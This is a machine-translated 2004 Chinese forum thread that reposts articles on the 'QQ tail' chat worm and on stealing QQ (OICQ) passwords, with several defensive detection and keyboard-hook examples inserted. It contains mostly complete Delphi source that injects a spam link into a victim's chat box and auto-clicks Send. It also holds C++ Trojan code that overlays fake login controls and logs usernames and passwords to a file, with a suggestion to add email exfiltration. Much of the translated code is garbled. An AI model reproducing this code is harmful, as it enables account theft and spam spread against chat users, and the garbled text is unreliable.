    end;
  end;
end;

The figure after the complete program is running:

If there is any problem:

Please ask on http://asp.itdrp.com/hottey. (And there is a source download)

Author Blog: http://blog.9cbs.net/Hottey/
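The lParam >= 0 test used in the keyboard hook procedures on this page reads bit 31 of the keystroke flags through the sign of the value. As an added example (not code from the original posts), this C snippet decodes the lParam bit fields and compares the sign test with an explicit mask over a constructed Ctrl+Enter key sequence; the 64-bit case assumes the 32-bit flag word arrives zero-extended in a wider LPARAM, and all names are illustrative.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Bit fields of the keystroke lParam handed to a WH_KEYBOARD hook. */
typedef struct {
    unsigned repeat_count; /* bits 0-15: repeat count */
    unsigned scan_code;    /* bits 16-23: hardware scan code */
    int extended;          /* bit 24: extended key */
    int alt_down;          /* bit 29: context code (ALT held) */
    int was_down;          /* bit 30: key was already down before this event */
    int released;          /* bit 31: transition state, 1 = key being released */
} KeyInfo;

typedef enum { KEY_FIRST_PRESS, KEY_AUTO_REPEAT, KEY_RELEASE } KeyEvent;

KeyInfo decode_key_lparam(int64_t lparam) {
    uint32_t v = (uint32_t)lparam;   /* the flags live in the low 32 bits */
    KeyInfo k;
    k.repeat_count = v & 0xFFFFu;
    k.scan_code = (v >> 16) & 0xFFu;
    k.extended = (int)((v >> 24) & 1u);
    k.alt_down = (int)((v >> 29) & 1u);
    k.was_down = (int)((v >> 30) & 1u);
    k.released = (int)((v >> 31) & 1u);
    return k;
}

KeyEvent classify_key(int64_t lparam) {
    KeyInfo k = decode_key_lparam(lparam);
    if (k.released) return KEY_RELEASE;
    return k.was_down ? KEY_AUTO_REPEAT : KEY_FIRST_PRESS;
}

/* Constructed sample: Enter (scan code 0x1C) pressed, held for two
 * auto-repeats, then released. */
static const uint32_t SAMPLE[] = { 0x001C0001u, 0x401C0001u, 0x401C0001u, 0xC01C0001u };
#define SAMPLE_LEN (sizeof SAMPLE / sizeof SAMPLE[0])

/* Events that pass "lParam >= 0" when LPARAM is a signed 32-bit value. */
int count_sign_test_32(void) {
    int n = 0;
    for (size_t i = 0; i < SAMPLE_LEN; i++)
        if ((int32_t)SAMPLE[i] >= 0) n++;
    return n;
}

/* Same test when the flags sit zero-extended in a signed 64-bit value
 * (assumption): bit 31 no longer affects the sign, so releases pass too. */
int count_sign_test_64(void) {
    int n = 0;
    for (size_t i = 0; i < SAMPLE_LEN; i++)
        if ((int64_t)SAMPLE[i] >= 0) n++;
    return n;
}

/* Explicit mask on bit 31: the result does not depend on the integer width. */
int count_mask_test(void) {
    int n = 0;
    for (size_t i = 0; i < SAMPLE_LEN; i++)
        if (!decode_key_lparam((int64_t)SAMPLE[i]).released) n++;
    return n;
}

/* Only the initial press, ignoring auto-repeat while the key is held. */
int count_first_press(void) {
    int n = 0;
    for (size_t i = 0; i < SAMPLE_LEN; i++)
        if (classify_key((int64_t)SAMPLE[i]) == KEY_FIRST_PRESS) n++;
    return n;
}

int main(void) {
    printf("sign test, 32-bit: %d\n", count_sign_test_32());
    printf("sign test, 64-bit: %d\n", count_sign_test_64());
    printf("mask test:         %d\n", count_mask_test());
    printf("first press only:  %d\n", count_first_press());
    return 0;
}
```

The sign test passes the auto-repeat events as well as the first press, so a hook that should act once per keystroke also has to look at bit 30.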


#

Reply: QQ information

2004-10-20 3:48 PM

Bing314

Implementation of "QQ Tail Virus" core technology blog

http://blog.9cbs.net/titilima/archive/2004/02/09/21451.aspx


#

Reply: QQ information

2004-10-20 3:54 PM

Bing314

http://home.nuc.edu.cn/~titilima/readArticle.php?id=23


#

Reply: QQ information

2004-10-21 8:38 AM

Bing314

http://dev.9cbs.net/develop/Article/21/21715.shtm

Title QQ Tail Virus Send Principle Analysis Selection from Wuqiu's Blog

Keyword QQ tail

Somewhere

Analysis of Sending Principle of QQ Tail Virus

Recently the QQ tail virus has been rampant. I too often receive tail messages sent by online friends, so out of curiosity I studied how this virus works. First of all, I do not know the true principle of the QQ tail virus; I am only guessing, and wrote a similar program to implement it.

QQ tail: when the user opens a QQ send-message window, the virus automatically enters text in the message text box and sends it out before the user can react.

Program implementation: first, find the handle of the QQ send-message window, and the window handles of the message text box and the "Send" button.

1. How to find the QQ send-message window handle:

QQ sends messages in two modes. One is message mode, in which the window title contains the words "send message"; the other is chat mode, in which the window title contains the word "chat".

You can find the corresponding handle by enumerating the windows:

// Get QQ's send-message window
function GetQQWnd: HWND;
var
  hCurrentWindow: HWND;
  WndText: string;
begin
  hCurrentWindow := GetWindow(Application.Handle, GW_HWNDFIRST);
  while hCurrentWindow <> 0 do
  begin
    WndText := GetWndText(hCurrentWindow);
    if (Pos('chat', WndText) > 0) or (Pos('Send Message', WndText) > 0) then
    begin
      Result := hCurrentWindow;
      Exit;
    end;
    hCurrentWindow := GetWindow(hCurrentWindow, GW_HWNDNEXT);
  end;
  Result := 0;
end;

Second, how to find the "Send" button handle:

After finding the QQ send message window, you can find the "Send" button handle. If the window handle is QQWnd, you can use a loop to find the text containing the "Send" window. After the experiment, "Send" The button is precisely the first child window of the form, so that you can use

btnwnd: = getdlgitem (QQWnd, 1); // Send button

to get the handle of the "Send" button.

Third, how to find the message text box window handle:

The message text box is not easy to find, but you can enter a few letters in the message text box, such as "abcd", and then use the method above to find it. Experiment shows, however, that the message text box is not a direct child window of the QQ window but a child window of one of its child windows. Through experiments, you can use

TXTWND: = GetWindow (Getdlgitem (QQWND, 0), GW_CHILD); // Text Box

to get it.

Fourth, how to get the original text of the message text box:

To get the original text of the message text box, only one API function is required, as follows:

// get window text

Function getWndtext (hwnd: hwnd): String;

VAR

RET: longint;

MTEXT: PCHAR;

BUF: Integer;

Begin

RET: = SendMessage (HWND, WM_GETTEXTLENGTH, 0, 0) 1;

GetMem (mtext, reing);

Try

BUF: = longint (mtext);

SendMessage (HWND, WM_GETTEXT, RET, BUF);

Result: = STRPAS (MTEXT);

Finally

FreeMem (mText, Ret);

END;

END;

5. How to set the text of the message text box:

This is the reverse of getting the text:

// Send text to the window

Procedure setWndtext (hwnd: hwnd; text: string);

VAR

RET: longint;

MTEXT: PCHAR;

BUF: Integer;

Begin

GetMem (MTEXT, Length (Text));

Stropy (mtext, pchar (text));

Try

BUF: = longint (mtext);

SendMessage (HWND, WM_SETTEXT, 0, BUF);

Finally

FreeMem (MTEXT, Length (Text));

END;

END;

6. How to make the "Send" button click automatically: everything is ready, and now we want to start sending. To send the message automatically, we can simulate a click on the "Send" button.

SendMessage (btnwnd, wm_lbuttondown, mk_lbutton, 0);

SendMessage (btnwnd, wm_lbuttonup, 0,0);

The click-to-send function is implemented by simulating a mouse click on the "Start" button.

7. The other timing functions are relatively simple, so I won't say more about them here.

Eight, all the source code is as follows:

Unit unit1;

Interface

Uses

Windows, Messages, Sysutils, Variants, Classes, Graphics, Controls, Forms,

Dialogs, Stdctrls, ExtCtrls;

Type

TFORM1 = Class (TFORM)

Timer1: TTIMER;

Button1: tbutton;

EDIT1: TEDIT;

Label1: TLABEL;

Button2: tbutton;

Procedure Timer1Timer (Sender: TOBJECT);

Procedure Button1Click (Sender: TOBJECT);

Procedure Button2Click (Sender: TOBJECT);

Private

{Private Declarations}

public

{Public declarations}

END;

VAR

FORM1: TFORM1;

IMPLEMentation

{$ R * .dfm}

// get window text

Function getWndtext (hwnd: hwnd): String;

VAR

RET: longint;

MTEXT: PCHAR;

BUF: Integer;

Begin

RET: = SendMessage (HWND, WM_GETTEXTLENGTH, 0, 0) 1;

GetMem (mtext, reing);

Try

BUF: = longint (mtext);

SendMessage (HWND, WM_GETTEXT, RET, BUF);

Result: = STRPAS (MTEXT);

Finally

FreeMem (mText, Ret);

END;

END;

// Send text to the window

Procedure setWndtext (hwnd: hwnd; text: string);

VAR

RET: longint;

MTEXT: PCHAR;

BUF: Integer;

Begin

GetMem (MTEXT, Length (Text));

Stropy (mtext, pchar (text));

Try

BUF: = longint (mtext);

SendMessage (HWND, WM_SETTEXT, 0, BUF);

Finally

FreeMem (MTEXT, Length (Text));

END;

END;

// Get the send message window of QQ

Function getqqwnd: hwnd;

VAR

HcurrentWindow: hwnd;

WNDTEXT: STRING;

Begin

HcurrentWindow: = getWindow (Application.handle, GW_HWndFirst);

While HcurrentWindow <> 0 DO

Begin

WNDTEXT: = GetWndText (HcurrentWindow);

IF (POS ('chat ", wndtext)> 0) or (POS (POS (' Send Message ', WNDTEXT)> 0) THEN

Begin

Result: = HcURRENTWINDOW;

END;

HcurrentWindow: = getWindow (HcurrentWindow, GW_HWndNext);

END;

Result: = 0;

END;

/ / Timed processing

Procedure TimerProc;

VAR

Qqwnd, txtwnd, btnwnd: hwnd;

Msg: String;

Begin

qqwnd: = getqqwnd;

IF Qqwnd = 0.

btnwnd: = getdlgitem (QQWnd, 1); // Send button

TXTWND: = GetWindow (Getdlgitem (QQWND, 0), GW_CHILD); // Text Box

IF (btnwnd = 0) or (txtWnd = 0).

Msg: = getWndText (txtwnd);

Msg: = msg # 13 # 10 'Welcome to the green network http://www.lvyin.net';

SetWndText (TXTWND, MSG);

SendMessage (btnwnd, wm_lbuttondown, mk_lbutton, 0);

SendMessage (btnwnd, wm_lbuttonup, 0,0);

END;

Procedure TFORM1.TIMER1TIMER (Sender: TOBJECT);

Begin

TimerProc;

END;

Procedure TFORM1.BUTTON1CLICK (Sender: TOBJECT);

Begin

Timer1.enabled: = not timer1.enable;

IF Timer1.enabled Then

Button1.caption: = 'Stop'

Else

Button1.caption: = 'start';

END;

Procedure TFORM1.BUTTON2CLICK (Sender: TOBJECT);

Begin

Timer1.interval: = strt1.text);

END;

End.

Summary: Only the main function of the QQ message is automatically sent, which may be different from the principle of QQ tail (I don't know), but it should be almost the same. If you want to make the user feel unusual, you have to change it, don't send it automatically, but when you click the "Send" button, add your text. Such words can intercept the click message of the "Send" button, and then add the text in the above method, and then turn the message to the program. As for how to make it a virus, you will copy it yourself, self-hide, etc., that is another topic, there is not much talks here.

Note: This article is for technical research only. I hope no one uses it to cause trouble. If there are consequences, I am not responsible. Everyone is welcome to write to me.

Author: Wu Chong-ho

Email: wuqiu@regalcyber.com

Homepage: http://www.chuanghao.com

Author Blog: http://blog.9cbs.Net/wuqiu/
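From the defender's side, the sequence the article above relies on (text set from outside the process, then a synthetic click on a button of the same window a few milliseconds later) is itself the detection signal. The following is an added example, not part of the reposted article: it assumes a monitoring component that can attribute each window message to a sending process, and the record formats, PIDs and handles are constructed.

```python
from collections import namedtuple

# Win32 message IDs (winuser.h)
WM_SETTEXT, WM_LBUTTONDOWN, WM_LBUTTONUP = 0x000C, 0x0201, 0x0202

# Assumed (hypothetical) record formats for a window snapshot and a message trace.
Win = namedtuple("Win", "hwnd top cls pid")           # top = top-level ancestor
Msg = namedtuple("Msg", "ts_ms sender_pid hwnd msg")  # sender_pid 0 = real input

def find_injected_sends(trace, windows, max_gap_ms=500):
    """Flag a foreign WM_SETTEXT on a non-button control followed, within
    max_gap_ms, by a foreign down/up click pair on a button of the same
    top-level window. Returns [(sender_pid, top_hwnd, click_ts_ms), ...]."""
    alerts, pending, down = [], {}, {}
    for m in sorted(trace, key=lambda x: x.ts_ms):
        w = windows.get(m.hwnd)
        if w is None or m.sender_pid in (0, w.pid):
            continue  # unknown window, real user input, or the app itself
        is_button = w.cls.lower() == "button"
        key = (m.sender_pid, w.top)
        if m.msg == WM_SETTEXT and not is_button:
            pending[key] = m.ts_ms
        elif m.msg == WM_LBUTTONDOWN and is_button:
            down[(m.sender_pid, m.hwnd)] = m.ts_ms
        elif m.msg == WM_LBUTTONUP and down.pop((m.sender_pid, m.hwnd), None) is not None:
            t0 = pending.pop(key, None)
            if t0 is not None and m.ts_ms - t0 <= max_gap_ms:
                alerts.append((m.sender_pid, w.top, m.ts_ms))
    return alerts

# Constructed sample: one chat dialog (pid 4000) with a button and a text box.
SAMPLE_WINDOWS = {
    0x100: Win(0x100, 0x100, "#32770", 4000),
    0x101: Win(0x101, 0x100, "Button", 4000),
    0x102: Win(0x102, 0x100, "RichEdit20A", 4000),
}
SAMPLE_TRACE = [
    Msg(1000, 0, 0x101, WM_LBUTTONDOWN),     # real mouse click
    Msg(1080, 0, 0x101, WM_LBUTTONUP),
    Msg(2000, 4000, 0x102, WM_SETTEXT),      # the app updating its own control
    Msg(5000, 5120, 0x102, WM_SETTEXT),      # foreign process rewrites the text...
    Msg(5003, 5120, 0x101, WM_LBUTTONDOWN),  # ...and clicks 3 ms later
    Msg(5004, 5120, 0x101, WM_LBUTTONUP),
    Msg(9000, 6200, 0x102, WM_SETTEXT),      # foreign text change, no click
]

if __name__ == "__main__":
    for pid, top, ts in find_injected_sends(SAMPLE_TRACE, SAMPLE_WINDOWS):
        print(f"pid {pid} set text and clicked in window {top:#x} at {ts} ms")
```

A lone foreign `WM_SETTEXT` (the last trace entry) is not flagged, since accessibility and automation tools legitimately set text; only the set-then-click pair from the same sender raises an alert.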


#

Reply: QQ information

2004-10-21 8:43 AM

Bing314

http://community.9cbs.net/expert/topic/3374/3374436.xml?temp=.412533

Main topic: Why doesn't this hook function run? An implementation of a QQ tail

Servers: zjpixyniannian () Level:

Credit value: 98

Community: VC / MFC Process / Thread / DLL

Question points: 30

Reply number: 5

Published: 2004-9-15 12:33:07

This is a program that mimics the QQ tail, which was downloaded from 9CBS, but when I run it, it does not succeed. The problem is that although there are two hooks, the hook function is not running.

The following is the code file where the hook function is located.

Reply to: SteveCrisewu (Moon Knight) () Reputation: 91 2004-9-18 14:15:38 Score: 10

It is a QQ version issue; the author traced the QQ2003 version.

If you are using QQ2004, you need to slightly modify how the author looks for the g_rich handle.

You can go to my blog to see: blog.9cbs.net/stevecrisewu

An example

Reply to: zjpixyniannian () () Reputation: 98 2004-9-20 14:41:40 Score: 0

The 2004 version should have fixed this bug. It should be handling WM_PASTE. I can successfully apply this message on other programs. Thank you all.


#

Reply: QQ information

2004-10-21 9:00 AM

Bing314

Bait and Switch: Stealing the OICQ Password

Publisher: Soarlove (enter the soarlove personal column)

Release Date: 2002.08.21


Statement: This article is intended to analyze the methods of hacker attacks. Please do not use it for illegal purposes!

The development of the Internet has driven a big leap in the IT world. Hacker activity has also become increasingly rampant, attack techniques keep changing, hacker programs appear endlessly, and Trojans are even more varied: for example, monitoring keystrokes, replacing the login program, and so on. Now I will introduce another attack method: replacing the buttons of the login program. This is advisable! Now I will introduce the method.

Take the very familiar OICQ as an example to see how the program does the bait and switch. To replace the button and password box of the OICQ login program, you must first capture the handles of the login button and password box of the OICQ login program. Haha, once they are replaced with our own button and password box, need I say what can be done?

We need to get four CWnd handles: the user number CComboBox, the user password CEdit, the login button CButton, and the main dialog handle.

m_hoicq = findwindow (null, "QQ user login");

M_hok = CWnd :: fromHank = CWnd :: fromHandle (M_hoicq-> GetsafehWnd (), NULL, "Button", "Login");

m_hedit = cwnd :: fromHandle (FindWindowEx (m_hoicq-> getsafehwnd (), null, "edit", null);

M_HCOM = CWND :: fromHandle (FindWindowEx (m_hoicq-> getsafehwnd (), null, "combobox", null);

/// above M_hoicq, M_HOK, M_HEDIT, M_HCOM is CWND * type, respectively

With these four handles, the next thing to do is to generate a button and an edit box. The code:

cfont * m_font = m_hok-> getFont ();

cfont * m_font1 = m_hedit-> getFont ();

CRECT RECT;

CRECT RECT1;

m_hok-> getWindowRect (Rect);

m_hok-> screenToclient (Rect);

m_hedit-> getWindowRect (Rect1);

m_hedit-> screenToclient (Rect1);

Rect.Left = 14;

RECT.TOP = 117;

Rect.bottom = 117;

RECT.Right = 14;

Rect1.Left = 110;

RECT1.TOP = 56;

RECT1.BOTTOM = 56;

RECT1.Right = 110;

m_hok-> showwindow (sw_hide); // Hide Login button

m_hedit-> showwindow (sw_hide); // Silver password box

IF (M_Button.create ("Login", WS_CHILD | WS_VISIBLE | WS_TABSTOP | BS_DEFPUSHBUTTON, RECT, M_HOICQ, IDC_StartButton == false)

MessageBox ("error");

m_button.setfont (m_font, true);

M_Button.SetWnd (this);

m_button.setid (IDC_StartButton);

IF (m_edit.createex (0x204, "edit", "", 0x500100A0, RECT1, M_HOICQ, IDC_MYEDIT) == false)

MessageBox ("Error1");

m_edit.setfont (m_font1, true);

m_edit.setfocus ();

m_edit.setwnd (this);

M_Button in the above code is a CMYBUTTON type variable and m_edit is a CMYEDIT type variable; please read on.

These two controls are now generated, but generating them alone is not enough. The two controls have to tell us when Enter is pressed and when the left mouse button is clicked, so Edit and Button have to be subclassed. Generate two derived classes, CMYEDIT and CMYBUTTON, which handle PretranslateMessage and WM_LButton respectively and process the corresponding key and button events. These events send a message to my main dialog, which requires the handle of my dialog, so a function is generated in both derived classes:

SetWnd (CWND * PWND) is used to pass in the window handle of the main dialog.

In CMYEDIT's PretranslateMessage (MSG * PMSG), enter:

IF (PMSG-> Message == WM_KeyDown)

{

IF (PMSG-> wparam == vk_return)

M_Wnd-> SendMessage (WM_Buttondown, 0, 0);

}

In CMyButton's onlbuttonup (uint nflags, cpoint points), enter:

M_Wnd-> SendMessage (WM_Buttondown, 0, 0);

The code above sends a message to my dialog, and I have to handle that message cleanly, so that people will not know that my Trojan is secretly monitoring them:

CSTRING Password, CC;

Char loginname [20];

Memset (Loginname, 0, 20);

:: SendMessage (m_hcom-> getsafehwnd (), wm_gettext, 20, (lparam) Loginname;

m_edit.getWindowText (Password);

m_edit.showwindow (sw_hide);

m_hedit-> showwindow;

M_hok-> showwindow; Sw_SHOW

CC = 0x0d;

CC = 0x0a;

CFILEFIND M_FIND;

CFILE M_FILE;

IF (! m_find.findfile ("c: //oicqlog.dat"))))

M_File.Open ("c: //oicqlog.dat", cfile :: modecreate | cfile :: modewrite, null;

Else

{

m_file.open ("c: //oicqlog.dat", cfile :: modewrite;

m_file.seektoend ();

}

m_file.write (cc, cc.getlength);

m_file.write (loginname, sizeof (loginname));

m_file.write (cc, cc.getlength);

m_file.write (Password, Password.getLength ());

m_file.close ();

m_hedit-> setfocus ();

Char * ee = password.getBuffer (Password.getLength ());

:: SendMessage (m_hedit-> getsafehwnd (), WM_SETTEXT, 20, (LPARAM) EE);

KeyBD_Event (VK_RETURN, 0, 0);

KeyBD_Event (VK_RETURN, 0, 2, 0);

Return True;

Ok, a simple Trojan is written. If you add Email's function, it will become more perfect. The specific details can analyze the source code provided, the code can set the Email mailbox, SMTP server, once Send quantity, password file location.

Simple usage of the sample program: Press the "Capture" button After the program is hidden, when the QQ is opened, the button on QQ has been replaced, and the login information is recorded in the password file you set. Do not use this code for illegal purposes.
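The control replacement described in this post leaves a visible trace in the window tree: the look-alike controls are created by a different process than the dialog that hosts them, while the dialog's own password box and login button sit hidden. The following added example (not part of the original article) audits a window snapshot for that pattern; the `Ctl` record format is an assumption, and all handles and PIDs are constructed.

```python
from collections import namedtuple

# Assumed snapshot record, as a tool built on EnumChildWindows,
# GetWindowThreadProcessId and IsWindowVisible could produce it.
Ctl = namedtuple("Ctl", "hwnd parent cls pid visible")

def descendants(root, controls):
    """All controls below root, at any depth."""
    by_parent = {}
    for c in controls:
        by_parent.setdefault(c.parent, []).append(c)
    out, stack = [], [root]
    while stack:
        for c in by_parent.get(stack.pop(), []):
            out.append(c)
            stack.append(c.hwnd)
    return out

def audit_dialog(dialog_hwnd, dialog_pid, controls):
    """Find visible controls inside the dialog that another process created.

    Returns sorted (foreign_hwnd, foreign_pid, cls, hidden_native_hwnds);
    the last field lists hidden same-class controls owned by the dialog's
    own process, i.e. the originals the foreign control probably covers."""
    inside = descendants(dialog_hwnd, controls)
    findings = []
    for c in inside:
        if c.pid == dialog_pid or not c.visible:
            continue
        hidden = sorted(n.hwnd for n in inside
                        if n.pid == dialog_pid and not n.visible
                        and n.cls.lower() == c.cls.lower())
        findings.append((c.hwnd, c.pid, c.cls, hidden))
    return sorted(findings)

# Constructed snapshot: login dialog 0x200 (pid 3100) after tampering,
# and an untouched dialog 0x300 (pid 3200).
SAMPLE = [
    Ctl(0x201, 0x200, "ComboBox", 3100, True),
    Ctl(0x202, 0x200, "Edit", 3100, False),     # original password box, hidden
    Ctl(0x203, 0x200, "Button", 3100, False),   # original login button, hidden
    Ctl(0x204, 0x200, "Button", 3100, True),    # e.g. a cancel button
    Ctl(0x2A0, 0x200, "Edit", 7788, True),      # look-alike from another process
    Ctl(0x2A1, 0x200, "Button", 7788, True),
    Ctl(0x301, 0x300, "Static", 3200, True),
    Ctl(0x302, 0x301, "Edit", 3200, True),      # nested control, native
]

if __name__ == "__main__":
    for f in audit_dialog(0x200, 3100, SAMPLE):
        print("foreign control %#x (pid %d, %s) hides %s" % f)
```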

When reprinting, please cite the original address: https://www.9cbs.com/read-104109.html
